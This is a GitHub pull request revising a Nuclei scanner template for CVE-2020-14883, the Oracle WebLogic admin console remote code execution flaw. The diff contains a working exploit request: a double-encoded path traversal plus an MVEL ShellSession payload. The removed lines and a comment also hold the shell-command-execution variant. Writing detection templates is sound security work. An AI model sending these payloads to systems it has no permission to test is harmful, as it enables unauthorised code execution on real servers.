### PR TITLE
Updated CVE-2020-14883

### DIFF
--- a/http/cves/2020/CVE-2020-14883.yaml
+++ b/http/cves/2020/CVE-2020-14883.yaml
@@ -20,6 +20,7 @@ info:
   metadata:
     max-request: 1
     verified: "true"
+    shodan-query: title:"Oracle PeopleSoft Sign-in"
   tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020
 
 variables:

--- a/http/cves/2020/CVE-2020-14883.yaml
+++ b/http/cves/2020/CVE-2020-14883.yaml
@@ -4,7 +4,8 @@ info:
   name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution
   author: pdteam,vicrack
   severity: high
-  description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
+  description: |
+    The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
   reference:
     - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
@@ -16,12 +17,13 @@ info:
     cve-id: CVE-2020-14883
     cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
     epss-score: 0.97532
-  tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020
   metadata:
     max-request: 1
+    verified: "true"
+  tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020
 
 variables:
-  str: "{{rand_base(10)}}"
+  str: "{{randstr}}"
   revstr: "{{reverse(str)}}"
 
 http:
@@ -47,9 +49,9 @@ http:
         part: body
         words:
           - "{{revstr}}"
-        condition: and
 
       - type: status
         status:
           - 200
+
 # Enhanced by mp on 2022/04/20

--- a/http/cves/2020/CVE-2020-14883.yaml
+++ b/http/cves/2020/CVE-2020-14883.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-14883
 
 info:
   name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution
-  author: pdteam
+  author: pdteam,vicrack
   severity: high
   description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
   reference:
@@ -20,21 +20,21 @@ info:
   metadata:
     max-request: 1
 
+variables:
+  str: "{{rand_base(10)}}"
+  revstr: "{{reverse(str)}}"
+
 http:
   - raw:
+      # CMD: String cmd = req.getHeader("CMD");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
       - |
         POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
         Host: {{Hostname}}
         Accept-Language: en
-        CMD: {{cmd}}
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip, deflate
 
-        test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("CMD");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
-
-    payloads:
-      cmd:
-        - id
+        test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String result = new StringBuilder("{{str}}").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')
 
     matchers-condition: and
     matchers:
@@ -46,18 +46,10 @@ http:
       - type: word
         part: body
         words:
-          - 'uid='
-          - 'gid='
-          - 'groups='
+          - "{{revstr}}"
         condition: and
 
       - type: status
         status:
           - 200
-
-    extractors:
-      - type: regex
-        regex:
-          - "(u|g)id=.*"
-
 # Enhanced by mp on 2022/04/20


### PR DESCRIPTION
### Template / PR Information

- Updated CVE-2020-14883

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details 

I think this might be better,  as the `id` command may not exist on Windows.

![图片](https://user-images.githubusercontent.com/18179821/236606360-ea2863b3-2746-4fb0-aa61-ccdfc0e72b81.png)
![图片](https://user-images.githubusercontent.com/18179821/236606441-66900fef-7872-4856-ade8-783e9fcc72f1.png)


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
